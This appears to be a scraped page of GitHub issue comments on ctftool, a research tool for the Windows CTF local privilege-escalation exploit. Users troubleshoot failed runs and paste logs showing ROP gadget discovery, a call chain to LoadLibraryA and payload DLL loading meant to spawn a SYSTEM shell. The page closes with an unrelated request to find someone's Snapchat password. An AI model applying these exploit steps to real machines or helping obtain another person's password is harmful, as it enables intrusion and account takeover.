taviso / ctftool Goto Github PK

https://github.com/taviso/ctftool/releases/tag/v1.3

winversion is 1709 win 10. will the exploit work?

I'm experimenting with this in a corporate environment, but I can't seem to get a cmd shell spawned. Apologies if I'm missing something trivial.

Host is a Win10 VM Enterprise 1809 running in VMWare. Latest updates are from the 6th July.

Testing with the ctf-consent-system.ctf, ctf-exploit-common-win10.ctf and ctf-logonui-system.ctf fails to result in a shell being spawned, yet the output shows Exploit complete. Checking process explorer, there are no new cmd.exe processes running in other sessions/hidden.

Is this expected to work or am I missing something? What's the best way to go about debugging this?

Hi Taviso,
I haven't found ctftool.exe and other related files that were on this repository.
let me know to replicate on my side.

Thnx.

Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
Sorry, I don't recognise stub 0 for thread 10468
0x7ffb463e0000
Guessed combase => C:\WINDOWS\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1ed6c0
C:\WINDOWS\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...
Sorry, I don't recognise stub 0 for thread 10468
ctf>

I'm getting the failed message. What can cause this issue?

A comment on twitter says that on some systems C:\Windows\Temp is not writable, but he got the exploit working using C:\Temp instead.

https://twitter.com/matteomalvica/status/1161378715663831040

I should probably handle this in my script.

The sendinput command doesn't have any usage examples or detailed help. Is it not meant to be used from the command line?

As standard untrusted user running ctftool on Windows 10 VM Version 1809 (OS Build 17763.379) errors -

"The code execution cannot proceed because MSVCP140.dll was not found. Reinstalling the program may fix this problems."

"The code execution cannot proceed because vcruntime140.dll was not found. Reinstalling the program may fix this problem."

Need to include dll dependencies in makefile?

Thanks.

So I run into this issue when I run the "ctf-consent-system.ctf" script. Pops UAC gives me the error in the screenshot and then just doesn't work. Reopens UAC and then does nothing.

Based off what you've shared I'm doing the same stuff as you. Run the script hit an app that requires UAC and then I wait. All I'm trying to open is CMD. I also tried it with running acrobat as admin and when UAC pops it flashes and then comes back again and then doesn't do anything. Running 1803

This seems possible on Windows Server too. I will be having a look later for the correct index for CTipProxy, however the jump to msvcrt's _init_time seems possible.

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000238
ctf> scan
failed to send message to server, giving up, 0xc0000041
ctf>

all is going well, just the cmd is not getting spawned on the locked screen.

Below are the artifacts for the same

ctf> script scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
C:payload64.dll
1 File(s) copied

The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 0000023C...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 0000023C
Client 0, Tid 5792 (Flags 0000, Hwnd 000016A0, Pid 3032, ctftool.exe)
Client 1, Tid 9196 (Flags 0x1000000c, Hwnd 000023EC, Pid 3044, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 9196
ReleaseId is 1803
Guessed msvcrt => C:\WINDOWS\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x30c20
C:\WINDOWS\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\WINDOWS\system32\kernel32.DLL->.data->VirtualAddress is 0x0a8000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 01429368, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C
000010: 01 00 00 00 43 c4 1f 00 ....C...
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x1fc443
0x7ffdf3270000
0x7ffdf3a30000
0x7ffdf38b0000
Guessed msctf => C:\WINDOWS\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xc3550
C:\WINDOWS\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffdf3a30000
Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL
C:\WINDOWS\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1e090
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffdf33d0000
Guessed combase => C:\WINDOWS\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1d9270
C:\WINDOWS\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\WINDOWS\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

Hello

I was unable to find ctftool.exe in provided download file hence unable to test and proceed. Can you help me to get the file ?

Thank you

I need zomw help findinf a snapchatpasswors